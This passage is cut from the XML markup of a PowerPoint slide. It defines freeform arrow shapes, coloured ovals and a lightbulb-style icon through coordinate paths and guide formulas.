                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="14" y="499"/>
                      <a:pt x="54" y="539"/>
                      <a:pt x="104" y="540"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="563" y="543"/>
                      <a:pt x="563" y="543"/>
                      <a:pt x="563" y="543"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="606" y="543"/>
                      <a:pt x="642" y="579"/>
                      <a:pt x="642" y="622"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="642" y="892"/>
                      <a:pt x="642" y="892"/>
                      <a:pt x="642" y="892"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="642" y="895"/>
                      <a:pt x="644" y="898"/>
                      <a:pt x="648" y="898"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="651" y="898"/>
                      <a:pt x="654" y="895"/>
                      <a:pt x="654" y="892"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="654" y="622"/>
                      <a:pt x="654" y="622"/>
                      <a:pt x="654" y="622"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="654" y="572"/>
                      <a:pt x="613" y="531"/>
                      <a:pt x="563" y="53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" name="Freeform 269"/>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="5818221" y="2671766"/>
                <a:ext cx="490540" cy="4175129"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 241 w 259"/>
                  <a:gd name="T1" fmla="*/ 104 h 2203"/>
                  <a:gd name="T2" fmla="*/ 149 w 259"/>
                  <a:gd name="T3" fmla="*/ 11 h 2203"/>
                  <a:gd name="T4" fmla="*/ 110 w 259"/>
                  <a:gd name="T5" fmla="*/ 11 h 2203"/>
                  <a:gd name="T6" fmla="*/ 18 w 259"/>
                  <a:gd name="T7" fmla="*/ 104 h 2203"/>
                  <a:gd name="T8" fmla="*/ 37 w 259"/>
                  <a:gd name="T9" fmla="*/ 150 h 2203"/>
                  <a:gd name="T10" fmla="*/ 76 w 259"/>
                  <a:gd name="T11" fmla="*/ 150 h 2203"/>
                  <a:gd name="T12" fmla="*/ 76 w 259"/>
                  <a:gd name="T13" fmla="*/ 2203 h 2203"/>
                  <a:gd name="T14" fmla="*/ 183 w 259"/>
                  <a:gd name="T15" fmla="*/ 2203 h 2203"/>
                  <a:gd name="T16" fmla="*/ 183 w 259"/>
                  <a:gd name="T17" fmla="*/ 150 h 2203"/>
                  <a:gd name="T18" fmla="*/ 222 w 259"/>
                  <a:gd name="T19" fmla="*/ 150 h 2203"/>
                  <a:gd name="T20" fmla="*/ 241 w 259"/>
                  <a:gd name="T21" fmla="*/ 104 h 2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9" h="2203">
                    <a:moveTo>
                      <a:pt x="241" y="104"/>
                    </a:moveTo>
                    <a:cubicBezTo>
                      <a:pt x="149" y="11"/>
                      <a:pt x="149" y="11"/>
                      <a:pt x="149" y="11"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="138" y="0"/>
                      <a:pt x="121" y="0"/>
                      <a:pt x="110" y="11"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="18" y="104"/>
                      <a:pt x="18" y="104"/>
                      <a:pt x="18" y="104"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="0" y="121"/>
                      <a:pt x="12" y="150"/>
                      <a:pt x="37" y="150"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="76" y="150"/>
                      <a:pt x="76" y="150"/>
                      <a:pt x="76" y="150"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="76" y="2203"/>
                      <a:pt x="76" y="2203"/>
                      <a:pt x="76" y="2203"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="183" y="2203"/>
                      <a:pt x="183" y="2203"/>
                      <a:pt x="183" y="2203"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="183" y="150"/>
                      <a:pt x="183" y="150"/>
                      <a:pt x="183" y="150"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="222" y="150"/>
                      <a:pt x="222" y="150"/>
                      <a:pt x="222" y="150"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="246" y="150"/>
                      <a:pt x="259" y="121"/>
                      <a:pt x="241" y="10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72" name="Freeform 270"/>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="6024597" y="2955929"/>
                <a:ext cx="77788" cy="3902079"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 41 w 41"/>
                  <a:gd name="T1" fmla="*/ 20 h 2059"/>
                  <a:gd name="T2" fmla="*/ 20 w 41"/>
                  <a:gd name="T3" fmla="*/ 0 h 2059"/>
                  <a:gd name="T4" fmla="*/ 0 w 41"/>
                  <a:gd name="T5" fmla="*/ 20 h 2059"/>
                  <a:gd name="T6" fmla="*/ 0 w 41"/>
                  <a:gd name="T7" fmla="*/ 38 h 2059"/>
                  <a:gd name="T8" fmla="*/ 14 w 41"/>
                  <a:gd name="T9" fmla="*/ 23 h 2059"/>
                  <a:gd name="T10" fmla="*/ 14 w 41"/>
                  <a:gd name="T11" fmla="*/ 2053 h 2059"/>
                  <a:gd name="T12" fmla="*/ 20 w 41"/>
                  <a:gd name="T13" fmla="*/ 2059 h 2059"/>
                  <a:gd name="T14" fmla="*/ 26 w 41"/>
                  <a:gd name="T15" fmla="*/ 2053 h 2059"/>
                  <a:gd name="T16" fmla="*/ 26 w 41"/>
                  <a:gd name="T17" fmla="*/ 23 h 2059"/>
                  <a:gd name="T18" fmla="*/ 41 w 41"/>
                  <a:gd name="T19" fmla="*/ 38 h 2059"/>
                  <a:gd name="T20" fmla="*/ 41 w 41"/>
                  <a:gd name="T21" fmla="*/ 20 h 20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2059">
                    <a:moveTo>
                      <a:pt x="41" y="2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053"/>
                      <a:pt x="14" y="2053"/>
                      <a:pt x="14" y="2053"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="14" y="2056"/>
                      <a:pt x="17" y="2059"/>
                      <a:pt x="20" y="2059"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="24" y="2059"/>
                      <a:pt x="26" y="2056"/>
                      <a:pt x="26" y="205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41" y="38"/>
                      <a:pt x="41" y="38"/>
                      <a:pt x="41" y="38"/>
                    </a:cubicBezTo>
                    <a:lnTo>
                      <a:pt x="41" y="2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" name="Oval 272"/>
              <p:cNvSpPr>
                <a:spLocks noChangeArrowheads="1"/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="5094317" y="3894142"/>
                <a:ext cx="530228" cy="530226"/>
              </a:xfrm>
              <a:prstGeom prst="ellipse">
                <a:avLst/>
              </a:prstGeom>
              <a:solidFill>
                <a:schemeClr val="accent4"/>
              </a:solidFill>
              <a:ln w="428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" name="Oval 273"/>
              <p:cNvSpPr>
                <a:spLocks noChangeArrowheads="1"/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="6492912" y="3894142"/>
                <a:ext cx="530228" cy="530226"/>
              </a:xfrm>
              <a:prstGeom prst="ellipse">
                <a:avLst/>
              </a:prstGeom>
              <a:solidFill>
                <a:schemeClr val="accent4"/>
              </a:solidFill>
              <a:ln w="428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" name="Oval 274"/>
              <p:cNvSpPr>
                <a:spLocks noChangeArrowheads="1"/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="7142204" y="4510093"/>
                <a:ext cx="530228" cy="530226"/>
              </a:xfrm>
              <a:prstGeom prst="ellipse">
                <a:avLst/>
              </a:prstGeom>
              <a:solidFill>
                <a:schemeClr val="accent3"/>
              </a:solidFill>
              <a:ln w="428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" name="Oval 275"/>
              <p:cNvSpPr>
                <a:spLocks noChangeArrowheads="1"/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="4443438" y="4510093"/>
                <a:ext cx="531815" cy="530226"/>
              </a:xfrm>
              <a:prstGeom prst="ellipse">
                <a:avLst/>
              </a:prstGeom>
              <a:solidFill>
                <a:schemeClr val="accent3"/>
              </a:solidFill>
              <a:ln w="428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78" name="Oval 276"/>
              <p:cNvSpPr>
                <a:spLocks noChangeArrowheads="1"/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="3824310" y="5351469"/>
                <a:ext cx="530228" cy="530226"/>
              </a:xfrm>
              <a:prstGeom prst="ellipse">
                <a:avLst/>
              </a:prstGeom>
              <a:solidFill>
                <a:schemeClr val="accent2"/>
              </a:solidFill>
              <a:ln w="428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79" name="Oval 277"/>
              <p:cNvSpPr>
                <a:spLocks noChangeArrowheads="1"/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="7761332" y="5351469"/>
                <a:ext cx="530228" cy="530226"/>
              </a:xfrm>
              <a:prstGeom prst="ellipse">
                <a:avLst/>
              </a:prstGeom>
              <a:solidFill>
                <a:schemeClr val="accent2"/>
              </a:solidFill>
              <a:ln w="428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Oval 272"/>
              <p:cNvSpPr>
                <a:spLocks noChangeArrowheads="1"/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="5800530" y="3286129"/>
                <a:ext cx="530228" cy="530226"/>
              </a:xfrm>
              <a:prstGeom prst="ellipse">
                <a:avLst/>
              </a:prstGeom>
              <a:solidFill>
                <a:schemeClr val="accent5"/>
              </a:solidFill>
              <a:ln w="428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63" name="Freeform 108">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{A5FB00DE-E6EA-4646-8A13-F5B98B24BD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87104" y="5170727"/>
              <a:ext cx="294749" cy="337399"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst/>
              <a:ahLst/>
              <a:cxnLst>
                <a:cxn ang="0">
                  <a:pos x="136" y="2"/>
                </a:cxn>
                <a:cxn ang="0">
                  <a:pos x="92" y="13"/>
                </a:cxn>
                <a:cxn ang="0">
                  <a:pos x="56" y="35"/>
                </a:cxn>
                <a:cxn ang="0">
                  <a:pos x="25" y="67"/>
                </a:cxn>
                <a:cxn ang="0">
                  <a:pos x="7" y="107"/>
                </a:cxn>
                <a:cxn ang="0">
                  <a:pos x="0" y="153"/>
                </a:cxn>
                <a:cxn ang="0">
                  <a:pos x="5" y="187"/>
                </a:cxn>
                <a:cxn ang="0">
                  <a:pos x="25" y="236"/>
                </a:cxn>
                <a:cxn ang="0">
                  <a:pos x="63" y="274"/>
                </a:cxn>
                <a:cxn ang="0">
                  <a:pos x="69" y="278"/>
                </a:cxn>
                <a:cxn ang="0">
                  <a:pos x="76" y="301"/>
                </a:cxn>
                <a:cxn ang="0">
                  <a:pos x="76" y="354"/>
                </a:cxn>
                <a:cxn ang="0">
                  <a:pos x="83" y="372"/>
                </a:cxn>
                <a:cxn ang="0">
                  <a:pos x="140" y="401"/>
                </a:cxn>
                <a:cxn ang="0">
                  <a:pos x="150" y="405"/>
                </a:cxn>
                <a:cxn ang="0">
                  <a:pos x="214" y="376"/>
                </a:cxn>
                <a:cxn ang="0">
                  <a:pos x="225" y="367"/>
                </a:cxn>
                <a:cxn ang="0">
                  <a:pos x="228" y="303"/>
                </a:cxn>
                <a:cxn ang="0">
                  <a:pos x="230" y="289"/>
                </a:cxn>
                <a:cxn ang="0">
                  <a:pos x="243" y="270"/>
                </a:cxn>
                <a:cxn ang="0">
                  <a:pos x="261" y="256"/>
                </a:cxn>
                <a:cxn ang="0">
                  <a:pos x="288" y="216"/>
                </a:cxn>
                <a:cxn ang="0">
                  <a:pos x="301" y="169"/>
                </a:cxn>
                <a:cxn ang="0">
                  <a:pos x="301" y="136"/>
                </a:cxn>
                <a:cxn ang="0">
                  <a:pos x="290" y="93"/>
                </a:cxn>
                <a:cxn ang="0">
                  <a:pos x="268" y="57"/>
                </a:cxn>
                <a:cxn ang="0">
                  <a:pos x="236" y="28"/>
                </a:cxn>
                <a:cxn ang="0">
                  <a:pos x="196" y="8"/>
                </a:cxn>
                <a:cxn ang="0">
                  <a:pos x="150" y="0"/>
                </a:cxn>
                <a:cxn ang="0">
                  <a:pos x="100" y="354"/>
                </a:cxn>
                <a:cxn ang="0">
                  <a:pos x="203" y="303"/>
                </a:cxn>
                <a:cxn ang="0">
                  <a:pos x="100" y="303"/>
                </a:cxn>
                <a:cxn ang="0">
                  <a:pos x="203" y="303"/>
                </a:cxn>
                <a:cxn ang="0">
                  <a:pos x="230" y="249"/>
                </a:cxn>
                <a:cxn ang="0">
                  <a:pos x="210" y="270"/>
                </a:cxn>
                <a:cxn ang="0">
                  <a:pos x="96" y="278"/>
                </a:cxn>
                <a:cxn ang="0">
                  <a:pos x="85" y="260"/>
                </a:cxn>
                <a:cxn ang="0">
                  <a:pos x="67" y="245"/>
                </a:cxn>
                <a:cxn ang="0">
                  <a:pos x="40" y="211"/>
                </a:cxn>
                <a:cxn ang="0">
                  <a:pos x="27" y="167"/>
                </a:cxn>
                <a:cxn ang="0">
                  <a:pos x="25" y="140"/>
                </a:cxn>
                <a:cxn ang="0">
                  <a:pos x="36" y="104"/>
                </a:cxn>
                <a:cxn ang="0">
                  <a:pos x="54" y="71"/>
                </a:cxn>
                <a:cxn ang="0">
                  <a:pos x="82" y="47"/>
                </a:cxn>
                <a:cxn ang="0">
                  <a:pos x="114" y="31"/>
                </a:cxn>
                <a:cxn ang="0">
                  <a:pos x="150" y="26"/>
                </a:cxn>
                <a:cxn ang="0">
                  <a:pos x="176" y="29"/>
                </a:cxn>
                <a:cxn ang="0">
                  <a:pos x="212" y="42"/>
                </a:cxn>
                <a:cxn ang="0">
                  <a:pos x="239" y="64"/>
                </a:cxn>
                <a:cxn ang="0">
                  <a:pos x="261" y="93"/>
                </a:cxn>
                <a:cxn ang="0">
                  <a:pos x="274" y="127"/>
                </a:cxn>
                <a:cxn ang="0">
                  <a:pos x="277" y="153"/>
                </a:cxn>
                <a:cxn ang="0">
                  <a:pos x="270" y="192"/>
                </a:cxn>
                <a:cxn ang="0">
                  <a:pos x="250" y="229"/>
                </a:cxn>
                <a:cxn ang="0">
                  <a:pos x="232" y="249"/>
                </a:cxn>
              </a:cxnLst>
              <a:rect l="0" t="0" r="r" b="b"/>
              <a:pathLst>
                <a:path w="303" h="405">
                  <a:moveTo>
                    <a:pt x="150" y="0"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="150" y="0"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="136" y="2"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="121" y="4"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="107" y="8"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="92" y="13"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="80" y="18"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="67" y="28"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="56" y="35"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="45" y="46"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="34" y="57"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="25" y="67"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="18" y="80"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="13" y="93"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="7" y="107"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4" y="122"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2" y="136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2" y="171"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="5" y="187"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="9" y="205"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="16" y="221"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="25" y="236"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="36" y="251"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="49" y="263"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="63" y="274"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="65" y="276"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="65" y="276"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="69" y="278"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="71" y="281"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="74" y="290"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="76" y="301"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="76" y="303"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="76" y="354"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="76" y="354"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="76" y="359"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="80" y="367"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="83" y="372"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="89" y="376"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="140" y="401"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="140" y="401"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="145" y="403"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="150" y="405"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="150" y="405"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="158" y="403"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="163" y="401"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="214" y="376"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="214" y="376"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="219" y="372"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="225" y="367"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="227" y="359"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="228" y="354"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="228" y="303"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="228" y="303"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="228" y="296"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="230" y="289"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="236" y="278"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="241" y="272"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="243" y="270"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="248" y="267"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="248" y="267"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="261" y="256"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="272" y="243"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="281" y="231"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="288" y="216"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="294" y="200"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="299" y="185"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="301" y="169"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="303" y="153"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="303" y="153"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="301" y="136"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="299" y="122"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="295" y="107"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="290" y="93"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="285" y="80"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="275" y="67"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="268" y="57"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="257" y="46"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="246" y="35"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="236" y="28"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="223" y="18"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="210" y="13"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="196" y="8"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="181" y="4"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="167" y="2"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="150" y="0"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="150" y="0"/>
                  </a:lnTo>
                  <a:close/>
                  <a:moveTo>
                    <a:pt x="150" y="379"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="100" y="354"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="203" y="354"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="150" y="379"/>
                  </a:lnTo>
                  <a:close/>
                  <a:moveTo>
                    <a:pt x="203" y="303"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="203" y="328"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="100" y="328"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="100" y="303"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="100" y="303"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="203" y="303"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="203" y="303"/>
                  </a:lnTo>
                  <a:close/>
                  <a:moveTo>
                    <a:pt x="232" y="249"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="232" y="249"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="230" y="249"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="223" y="254"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="214" y="263"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="210" y="270"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="207" y="278"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="96" y="278"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="96" y="278"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="94" y="270"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="91" y="265"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="85" y="260"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="78" y="254"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="78" y="254"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="67" y="245"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="56" y="234"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="47" y="223"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="40" y="211"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="34" y="196"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="29" y="182"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="27" y="167"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="25" y="153"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="25" y="153"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="25" y="140"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="27" y="127"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="31" y="115"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="36" y="104"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="40" y="93"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="47" y="82"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="54" y="71"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="62" y="64"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="71" y="55"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="82" y="47"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="91" y="42"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="101" y="37"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="114" y="31"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="125" y="29"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="138" y="28"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="150" y="26"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="150" y="26"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="165" y="28"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="176" y="29"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="188" y="31"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="199" y="37"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="212" y="42"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="221" y="47"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="232" y="55"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="239" y="64"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="248" y="71"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="256" y="82"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="261" y="93"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="266" y="104"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="272" y="115"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="274" y="127"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="275" y="140"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="277" y="153"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="277" y="153"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="275" y="165"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="274" y="180"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="270" y="192"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="265" y="205"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="259" y="218"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="250" y="229"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="243" y="240"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="232" y="249"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="232" y="24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2400"/>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="71" name="Freeform 101">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{6CE2D89F-B14A-43D5-B35A-7B5A7ECE5A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08731" y="4364532"/>
              <a:ext cx="297194" cy="274954"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst>
                <a:gd name="T0" fmla="*/ 133841 w 68"/>
                <a:gd name="T1" fmla="*/ 123371 h 63"/>
                <a:gd name="T2" fmla="*/ 140704 w 68"/>
                <a:gd name="T3" fmla="*/ 150787 h 63"/>
                <a:gd name="T4" fmla="*/ 120113 w 68"/>
                <a:gd name="T5" fmla="*/ 171349 h 63"/>
                <a:gd name="T6" fmla="*/ 92659 w 68"/>
                <a:gd name="T7" fmla="*/ 181630 h 63"/>
                <a:gd name="T8" fmla="*/ 61773 w 68"/>
                <a:gd name="T9" fmla="*/ 181630 h 63"/>
                <a:gd name="T10" fmla="*/ 37750 w 68"/>
                <a:gd name="T11" fmla="*/ 171349 h 63"/>
                <a:gd name="T12" fmla="*/ 13727 w 68"/>
                <a:gd name="T13" fmla="*/ 150787 h 63"/>
                <a:gd name="T14" fmla="*/ 20591 w 68"/>
                <a:gd name="T15" fmla="*/ 123371 h 63"/>
                <a:gd name="T16" fmla="*/ 0 w 68"/>
